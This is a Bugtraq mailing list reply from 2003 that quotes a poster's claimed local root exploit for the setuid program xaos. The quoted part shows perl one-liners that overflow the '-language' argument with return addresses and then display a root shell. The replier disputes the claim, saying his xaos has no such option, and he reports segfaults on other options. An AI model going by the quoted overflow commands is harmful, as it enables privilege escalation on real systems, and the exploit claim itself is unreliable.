[30372] in bugtraq
Re: BAZARR LOCAL ROOT AGAIN. HI GUYS. DONT READ THIS
daemon@ATHENA.MIT.EDU (Benjamin A. Okopnik)
Fri Jun 6 14:13:54 2003
Date: Fri, 6 Jun 2003 12:56:15 -0400
From: "Benjamin A. Okopnik" <ben@callahans.org>
To: "bazarr@ziplip.com" <bazarr@ziplip.com>
Message-ID: <20030606165615.GG5467@callahans.org>
Mail-Followup-To: "Benjamin A. Okopnik" <ben@callahans.org>,
"bazarr@ziplip.com" <bazarr@ziplip.com>, bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <GNPTJTEBDYMHAAKPLXEEIGNVGJHULZFQDTDXCJN0@ziplip.com>
On Thu, Jun 05, 2003 at 03:27:23PM -0700, bazarr@ziplip.com wrote:
[ snipping for context ]
> c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
> Segmentation fault
>
> [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AA
> Segmentation fault
> [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAA
> Segmentation fault
> [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAAA
> sh-2.05a# id ; uname -a
> uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
My version of "xaos" (v3.1, Debian "unstable") does not have a
"-language" option, and the above will simply generate the "help text"
(the list of available options.) It does, however, segfault on the
"-nogui" option and the "-render" option when a non-existent file name
is given as an argument.
Ben Okopnik
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No problem is so formidable that you can't just walk away from it.